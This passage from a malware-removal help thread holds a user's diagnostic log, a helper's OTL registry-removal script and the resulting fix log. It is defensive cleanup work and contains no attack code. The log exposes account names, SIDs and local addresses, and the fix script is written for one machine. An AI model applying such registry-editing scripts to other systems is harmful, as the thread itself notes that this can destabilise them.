TOSHIBA HDD/SSD Alert (HKLM\...\{D4322448-B6AF-4316-B859-D8A0E84DCB38}) (Version: 3.1.64.9 - TOSHIBA Corporation)

Toshiba Laptop Checkup (HKLM-x32\...\NortonPCCheckup) (Version: 2.0.13.11 - Symantec Corporation)

TOSHIBA Media Controller (HKLM-x32\...\{C7A4F26F-F9B0-41B2-8659-99181108CDE3}) (Version: 1.0.87.4 - TOSHIBA CORPORATION)

TOSHIBA Media Controller Plug-in (HKLM-x32\...\{F26FDF57-483E-42C8-A9C9-EEE1EDB256E0}) (Version: 1.0.8.0 - TOSHIBA CORPORATION)

Toshiba Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 2.0.0.31 - Toshiba)

TOSHIBA PC Health Monitor (HKLM\...\{9DECD0F9-D3E8-48B0-A390-1CF09F54E3A4}) (Version: 1.7.9.64 - TOSHIBA Corporation)

TOSHIBA Quality Application (HKLM-x32\...\{E69992ED-A7F6-406C-9280-1C156417BC49}) (Version: 1.0.4 - TOSHIBA)

TOSHIBA Recovery Media Creator (HKLM-x32\...\{B65BBB06-1F8E-48F5-8A54-B024A9E15FDF}) (Version: 2.1.5.5109a - TOSHIBA CORPORATION)

TOSHIBA ReelTime (HKLM-x32\...\InstallShield_{24811C12-F4A9-4D0F-8494-A7B8FE46123C}) (Version: 1.7.21.64 - TOSHIBA Corporation)

TOSHIBA Resolution+ Plug-in for Windows Media Player (HKLM-x32\...\{6CB76C9D-80C2-4CB3-A4CD-D96B239E3F94}) (Version: 1.1.2001 - TOSHIBA Corporation)

TOSHIBA Service Station (HKLM-x32\...\{AC6569FA-6919-442A-8552-073BE69E247A}) (Version: 2.2.13 - TOSHIBA)

TOSHIBA Sleep Utility (HKLM-x32\...\{654F7484-88C5-46DC-AB32-C66BCB0E2102}) (Version: 1.4.2.8 - TOSHIBA Corporation)

TOSHIBA Supervisor Password (HKLM-x32\...\InstallShield_{51B4E156-14A5-4904-9AE4-B1AA2A0E46BE}) (Version: 1.63.51.2C - TOSHIBA CORPORATION)

TOSHIBA Value Added Package (HKLM-x32\...\InstallShield_{066CFFF8-12BF-4390-A673-75F95EFF188E}) (Version: 1.6.1.64 - TOSHIBA Corporation)

TOSHIBA Web Camera Application (HKLM-x32\...\InstallShield_{6F3C8901-EBD3-470D-87F8-AC210F6E5E02}) (Version: 2.0.3.3 - TOSHIBA Corporation)

TOSHIBA Wireless Display Monitor (HKLM-x32\...\{617773AE-ADBA-4479-BB04-65FE7758B35C}) (Version: 1.0.1 - TOSHIBA CORPORATION)

TOSHIBARegistration (HKLM-x32\...\{5AF550B4-BB67-4E7E-82F1-2C4300279050}) (Version: 1.0.9 - TOSHIBA)

TurboTax 2009 (HKLM-x32\...\TurboTax 2009) (Version: - Intuit, Inc)

TurboTax 2010 (HKLM-x32\...\TurboTax 2010) (Version: - Intuit, Inc)

TurboTax 2011 (HKLM-x32\...\TurboTax 2011) (Version: - Intuit, Inc)

TurboTax 2012 (HKLM-x32\...\TurboTax 2012) (Version: 2012.0 - Intuit, Inc)

TurboTax 2013 (HKLM-x32\...\TurboTax 2013) (Version: 2013.0 - Intuit, Inc)

Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden

Utility Common Driver (x32 Version: 1.0.52.3C - TOSHIBA) Hidden

Vacation Quest - Australia (HKLM-x32\...\Vacation Quest - Australia) (Version: - PopCap Games)

Vacation Quest - The Hawaiian Islands (HKLM-x32\...\Vacation Quest - The Hawaiian Islands) (Version: - PopCap Games)

VIO (x32 Version: 1.5.10.332 - Corel Corporation) Hidden

WildTangent Games (HKLM-x32\...\WildTangent toshiba Master Uninstall) (Version: 1.0.2.5 - WildTangent)

WildTangent Games App (Toshiba Games) (x32 Version: 4.0.5.31 - WildTangent) Hidden

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3538.0513 - Microsoft Corporation)

Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{2902F983-B4C1-44BA-B85D-5C6D52E2C441}) (Version: 15.4.5722.2 - Microsoft Corporation)

Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-616022151-183045692-1389677156-1014_Classes\CLSID\{F6BF8414-962C-40FE-90F1-B80A7E72DB9A}\InprocServer32 -> C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}\actxprxy.dll (Microsoft Corporation)

==================== Restore Points =========================

21-10-2014 11:30:56 Windows Update

29-10-2014 12:08:41 ComboFix created restore point

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 21:34 - 2014-10-29 07:24 - 00000027 ____A C:\windows\system32\Drivers\etc\hosts

127.0.0.1 localhost

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D47314F-7D28-4291-B2F7-26349C2DBD62} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-25] (Google Inc.)

Task: {0E00A6F4-6AF8-4891-833C-F7D740218198} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)

Task: {1C7291B2-B00F-4A00-B58D-EB02BDCD372B} - System32\Tasks\Motorola Device Manager Engine => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()

Task: {26EB7565-2E78-46CB-A71F-7BFDDF920FAA} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-09-23] (Adobe Systems Incorporated)

Task: {30C6312B-D20D-4B19-80F3-88338114D4D7} - System32\Tasks\Motorola Device Manager Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()

Task: {5C77D2B6-0EE7-4DAF-9261-28786B2B6AF0} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-11] (Google Inc.)

Task: {83679F5F-14B5-40E7-96FE-86010A8B8670} - System32\Tasks\MotoCast Update => C:\Program Files (x86)\Motorola Mobility\MotoCast\LiveUpdate\MotoCastUpdate.exe [2012-07-24] ()

Task: {8DF79F42-F157-4588-AA4B-F4A9FE39D589} - System32\Tasks\{E61DD5E1-BD52-2A9D-750F-258FE7FE9D61} => C:\windows\system32\rjlqdrd.dll/s "C:\windows\system32\rjlqdrd.dll"

Task: {8F1BD512-6362-4B0C-B24C-F0DAA617D245} - System32\Tasks\IHSelfDeleteTASK => CMD

Task: {9249EE0A-F432-4A6E-B2EB-7B3E6500E5A2} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe [2012-10-11] (Google Inc.)

Task: {95F388A7-2F0E-4B5E-897A-7D1D88F0BE4F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-10-25] (Google Inc.)

Task: {95F41986-FC3B-460D-830A-36DEF2786CCC} - System32\Tasks\TOSHIBA Wireless Display Monitor => C:\Program Files (x86)\TOSHIBA\widimon\widimon.exe [2010-12-25] (TOSHIBA CORPORATION)

Task: {9CE64197-9726-4EE4-A2AB-06FB1895174A} - System32\Tasks\Motorola Device Manager Initial Update => C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotorolaDeviceManagerUpdate.exe [2013-10-31] ()

Task: {A09ED212-812F-4E47-B984-C677C9EF3865} - System32\Tasks\Norton 360\Norton Error Analyzer => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)

Task: {B0B25AB5-F1A7-4FE4-8248-8DA7BE55EED7} - System32\Tasks\Norton 360\Norton Error Processor => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\SymErr.exe [2014-01-30] (Symantec Corporation)

Task: {C0249251-0255-46EB-8265-2D06148CE0D5} - System32\Tasks\IHUninstallTrackingTASK => CMD

Task: {F703BE38-C7D6-4051-BF74-D2ED7683E82B} - System32\Tasks\Norton WSC Integration => C:\Program Files (x86)\Norton 360\Engine\21.6.0.32\WSCStub.exe [2014-09-21] (Symantec Corporation)

Task: C:\windows\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

Task: C:\windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002Core.job => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe

Task: C:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-616022151-183045692-1389677156-1002UA.job => C:\Users\Heathman\AppData\Local\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2011-05-31 19:32 - 2011-05-31 19:32 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\Libeay32.dll

2008-09-08 10:19 - 2008-09-08 10:19 - 00022016 _____ () C:\windows\System32\cl31cl6.dll

2011-03-11 16:14 - 2011-03-11 16:14 - 00030064 _____ () c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe

2011-06-27 11:16 - 2011-06-27 11:16 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll

2010-11-18 19:18 - 2010-11-18 19:18 - 11190784 _____ () C:\Program Files\TOSHIBA\FlashCards\BlackPng.dll

2010-11-30 12:37 - 2010-11-30 12:37 - 00048504 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnZ.dll

2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF10.dll

2010-03-03 16:15 - 2010-03-03 16:15 - 00019256 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\FnF11.dll

2010-12-15 17:19 - 2010-12-15 17:19 - 00124320 _____ () C:\Program Files\TOSHIBA\TECO\MUIHelp.dll

2011-05-31 19:32 - 2011-05-31 19:32 - 01501696 _____ () C:\Program Files\Common Files\Intel\WirelessCommon\LIBEAY32.dll

2011-06-09 23:09 - 2011-06-09 23:09 - 00079784 _____ () C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosIPCWraper.dll

2009-12-09 16:01 - 2009-12-09 16:01 - 00606208 _____ () C:\Windows\Samsung\PanelMgr\SSMMgr.exe

2012-04-16 20:15 - 2007-08-13 03:31 - 00327168 _____ () C:\Windows\Samsung\PanelMgr\caller64.exe

2011-02-22 21:22 - 2011-02-22 21:22 - 00429432 _____ () C:\Program Files\TOSHIBA\FlashCards\Hotkey\TcrdKBB.exe

2014-01-20 14:17 - 2014-01-20 14:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll

2014-01-20 14:16 - 2014-01-20 14:16 - 01044808 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll

2012-09-07 21:35 - 2012-09-07 21:35 - 00128960 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\liveupdatetactics.dll

2012-09-07 21:35 - 2012-09-07 21:35 - 00024496 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\DbAccess.dll

2012-09-07 21:37 - 2012-09-07 21:37 - 00466256 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\sqlite3.dll

2012-09-07 21:36 - 2012-09-07 21:36 - 00045992 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\NAdvLog.dll

2012-09-07 21:36 - 2012-09-07 21:36 - 00034752 _____ () C:\Program Files (x86)\Motorola Media Link\Lite\NFileCacheDBAccess.dll

2013-10-31 10:05 - 2013-10-31 10:05 - 00172032 _____ () C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\css_core.dll

2012-04-01 22:03 - 2012-04-01 22:03 - 00854016 _____ () C:\windows\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll

2012-04-02 20:32 - 2012-04-02 20:32 - 00471040 _____ () C:\windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.104.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll

2012-04-01 22:03 - 2012-04-01 22:03 - 00476520 _____ () C:\windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.136.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)

==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)

==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"

MSCONFIG\startupreg: Adobe Reader Speed Launcher => "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe"

MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"

MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime

========================= Accounts: ==========================

ADH (S-1-5-21-616022151-183045692-1389677156-1014 - Administrator - Enabled) => C:\Users\ADH.Heathman-PC

Administrator (S-1-5-21-616022151-183045692-1389677156-500 - Administrator - Disabled)

Guest (S-1-5-21-616022151-183045692-1389677156-501 - Limited - Disabled)

Heathman (S-1-5-21-616022151-183045692-1389677156-1002 - Administrator - Enabled) => C:\Users\Heathman

HomeGroupUser$ (S-1-5-21-616022151-183045692-1389677156-1009 - Limited - Enabled)

UpdatusUser (S-1-5-21-616022151-183045692-1389677156-1011 - Limited - Enabled) => C:\Users\UpdatusUser.Heathman-PC

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:

==================

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Local Hostname Heathman-PC.local already in use; will try Heathman-PC-2.local instead

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Received from 192.168.1.74:5353 4 Heathman-PC.local. Addr 192.168.1.74

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 lost: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Pkt Record: 8C63CF06 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:B1A4:91C4:8874:7D21

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 won: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

System errors:

=============

Error: (10/29/2014 08:46:07 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: The following fatal alert was generated: 40. The internal error state is 252.

Error: (10/29/2014 07:24:26 AM) (Source: Service Control Manager) (EventID: 7030) (User: )

Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/29/2014 07:19:08 AM) (Source: Application Popup) (EventID: 1060) (User: )

Description: \??\C:\ComboFix\catchme.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (10/29/2014 07:15:16 AM) (Source: Service Control Manager) (EventID: 7030) (User: )

Description: The PEVSystemStart service is marked as an interactive service. However, the system is configured to not allow interactive services. This service may not function properly.

Error: (10/28/2014 10:04:04 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/28/2014 09:21:40 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {995C996E-D918-4A8C-A302-45719A6F4EA7}

Error: (10/28/2014 09:21:34 PM) (Source: DCOM) (EventID: 10010) (User: )

Description: {078AEF33-C48A-49F7-AFF3-A0EE810BFE7C}

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )

Description: 0x800700b7

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14353) (User: )

Description: 00x800700b7http://+:10243/WMPNSSv4/2059632502/

Error: (10/28/2014 09:05:28 PM) (Source: WMPNetworkSvc) (EventID: 14349) (User: )

Description: 0x800700b7

Microsoft Office Sessions:

=========================

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: Local Hostname Heathman-PC.local already in use; will try Heathman-PC-2.local instead

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: ProbeCount 2; will deregister 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Received from 192.168.1.74:5353 4 Heathman-PC.local. Addr 192.168.1.74

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:46 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: mDNSCoreReceiveResponse: Ignoring response received before we even began probing: 4 Heathman-PC.local. Addr 192.168.1.69

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 lost: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Pkt Record: 8C63CF06 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:B1A4:91C4:8874:7D21

Error: (10/29/2014 07:58:45 AM) (Source: Bonjour Service) (EventID: 100) (User: )

Description: ResolveSimultaneousProbe: 0000000001627F00 Our Record 3 won: 8A68FECE 16 Heathman-PC.local. AAAA FE80:0000:0000:0000:957A:84DB:03F3:D562

CodeIntegrity Errors:

===================================

Date: 2014-10-29 07:19:08.227

Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-10-29 07:19:08.086

Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

Date: 2014-06-15 16:45:26.328

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:42.065

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:41.124

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:41.064

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.733

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.674

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.554

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

Date: 2014-06-15 16:44:40.494

Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume2\Program Files\Common Files\Motive\McciContextHook_DSR.dll because the set of per-page image hashes could not be found on the system.

==================== Memory info ===========================

Processor: Intel® Core i5-2450M CPU @ 2.50GHz

Percentage of memory in use: 37%

Total physical RAM: 8098.69 MB

Available physical RAM: 5057.74 MB

Total Pagefile: 16195.55 MB

Available Pagefile: 12824.47 MB

Total Virtual: 8192 MB

Available Virtual: 8191.85 MB

==================== Drives ================================

Drive c: (TI106332W0C) (Fixed) (Total:449.23 GB) (Free:297.34 GB) NTFS ==>[system with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================

Disk: 0 (MBR Code: Windows 7 or Vista) (Size: 465.8 GB) (Disk ID: 469CBCD6)

Partition 1: (Active) - (Size=1.5 GB) - (Type=27)

Partition 2: (Not Active) - (Size=449.2 GB) - (Type=07 NTFS)

Partition 3: (Not Active) - (Size=15.1 GB) - (Type=17)

==================== End Of Log ============================

Thank you

[Naathim]

Fix with OTL

Please re-run OTL with this removal script included.

This fix was created for this user for use on that particular machine.

Running it on another one may cause damage and render the system unstable.

• Right-click on icon and select Run as Administrator to start the tool.
• Under the Custom Scans/Fixes bar in the box paste in the following:

  :Commands[createrestorepoint]:OTLIE:64bit: - HKLM\..\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}: "URL" = http://www.ask.com/w...}&l=dis&o=ushplIE - HKLM\..\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}: "URL" = http://www.ask.com/w...}&l=dis&o=ushplIE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0IE - HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = <local>;192.168.*.*O3 - HKLM\..\Toolbar: (no name) - Locked - No CLSID value found.O16 - DPF: {36299202-09EF-4ABF-ADB9-47C599DBE778} https://www.hpwindow...PProdDetect.cab (Reg Error: Key error.) O16 - DPF: {49232000-16E4-426C-A231-62846947304B} https://wimpro.cce.h...ads/sysinfo.cab (Reg Error: Key error.) O16 - DPF: {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} http://h20270.www2.h...tDetection2.cab (Reg Error: Key error.) O16 - DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} http://java.sun.com/...indows-i586.cab (Reg Error: Key error.) O16 - DPF: {DF780F87-FF2B-4DF8-92D0-73DB16A1543A} http://zone.msn.com/...ploader_v10.cab (Reg Error: Key error.) O16 - DPF: {E2883E8F-472F-4FB0-9522-AC9BF37916A7} http://platformdl.ad...Plus/1.6/gp.cab (Reg Error: Key error.)

• Push Run Fix and wait patiently.
• If asked to reboot, please allow it to.
• A notepad window with a logfile will open after this run. It will be also saved in _OTL\MovedFiles directory on your main drive as (date)_(time).log.

Please include the content of this logfile in your next reply.

[adh]

OTL Log

========== COMMANDS ==========

Restore point Set: OTL Restore Point

========== OTL ==========

64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ deleted successfully.

64bit-Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{3F69DA71-DC06-4D09-BEF6-BC86B2EA700C}\ not found.

HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable|dword:0 /E : value set successfully!

HKU\S-1-5-21-616022151-183045692-1389677156-1014\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyOverride| /E : value set successfully!

Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Toolbar\\Locked deleted successfully.

Starting removal of ActiveX control {36299202-09EF-4ABF-ADB9-47C599DBE778}

C:\Windows\Downloaded Program Files\HPProdDetect.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{36299202-09EF-4ABF-ADB9-47C599DBE778}\ not found.

Starting removal of ActiveX control {49232000-16E4-426C-A231-62846947304B}

C:\Windows\Downloaded Program Files\sysinfo.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{49232000-16E4-426C-A231-62846947304B}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49232000-16E4-426C-A231-62846947304B}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{49232000-16E4-426C-A231-62846947304B}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{49232000-16E4-426C-A231-62846947304B}\ not found.

Starting removal of ActiveX control {73ECB3AA-4717-450C-A2AB-D00DAD9EE203}

C:\Windows\Downloaded Program Files\setup.inf not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{73ECB3AA-4717-450C-A2AB-D00DAD9EE203}\ not found.

Starting removal of ActiveX control {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ deleted successfully.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ not found.

Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA}\ not found.

